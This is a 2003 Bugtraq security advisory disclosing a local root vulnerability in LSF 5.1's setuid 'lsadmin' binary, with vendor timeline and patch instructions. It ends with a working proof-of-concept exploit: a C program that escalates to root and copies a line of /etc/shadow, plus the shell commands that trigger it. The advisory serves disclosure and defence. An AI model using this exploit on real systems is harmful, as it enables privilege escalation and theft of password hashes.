Message-ID: <Pine.LNX.4.44.0305221500440.1821-100000@rubycon.man.szczecin.pl>
Date: Thu, 22 May 2003 15:31:22 +0200 (CEST)
From: Tomasz Grabowski <cadence@...llo.aci.com.pl>
To: bugtraq@...urityfocus.com
Subject: Security advisory: LSF 5.1 local root exploit



	             Security Advisory

	                22 May 2003

	           Local root in LSF 5.1


Name:            Load Sharing Facility version 5.1
Severity:        High
Vendor URL:      http://www.platform.com
Author:          Tomasz Grabowski (cadence@....com.pl)
Vendor notified: 25 Feb 2003
Vendor response: 25 Feb 2003
Vendor fix:      19 Mar 2003

Commercial:      I'm looking for a new job


Impact: An attacker can gain root privilege by forcing the 'lsadmin'
	binary to execute code of the attacker's choice. The 'lsadmin' binary
	is setuid root.


Description:

The 'lsadmin' binary has a "ckconfig" command, which checks the
correctness of the config files. Right after it starts, it runs the
external 'lim' binary. It reads the LSF_SERVERDIR variable from the lsf.conf
file to obtain the path to the 'lim' binary. A regular user can create his own
lsf.conf file and, by setting the LSF_ENVDIR variable, force 'lsadmin' to
use it instead of the default /etc/lsf.conf file. The attacker can therefore point
the LSF_SERVERDIR variable at his own 'lim' binary. The attacker's 'lim'
binary will then be executed with setuid root privileges.


How to patch:

1) Download the lsadmin patch from Platform ftp site

ftp ftp.platform.com
location: /patches/5.1/patch/sup_by_dev33993/
file: lsadmin5.1_<os>.Z

If you do not have username/password to access ftp.platform.com, contact
support@...tform.com

2) In the LSF_BINDIR, move old lsadmin to lsadmin.old.
Uncompress and rename downloaded binary to lsadmin.
Move new lsadmin to LSF_BINDIR. Make sure permissions are 4755.

For more information on patch or related questions, contact
support@...tform.com



Exploit:


# LSF 5.1 'lsadmin' local root exploit
# 2003.03.20 - CADENCE of Lam3rZ

# Proof of concept - for educational purposes only!

cat <<__END__> attacker_code.c
#include <stdio.h>
#include <unistd.h>   /* setuid(), setgid() */
int main() {
    FILE *secret_file;
    FILE *temp_file;
    char one_line[128];
    setuid(0); setgid(0);
    secret_file = fopen("/etc/shadow", "r");
    temp_file = fopen(".temp.file", "w");
    fgets(one_line, 120, secret_file);
    fputs(one_line, temp_file);
    fclose(secret_file); fclose(temp_file);
    return 0;
}
__END__

gcc attacker_code.c -o lim
chmod 777 lim
export LSF_SERVERDIR=.
lsadmin ckconfig
cat .temp.file
rm -f attacker_code.c lim .temp.file



---
Tomasz Grabowski  (0-91)4494234
Akademickie Centrum Informatyki
mailto:cadence@....szczecin.pl



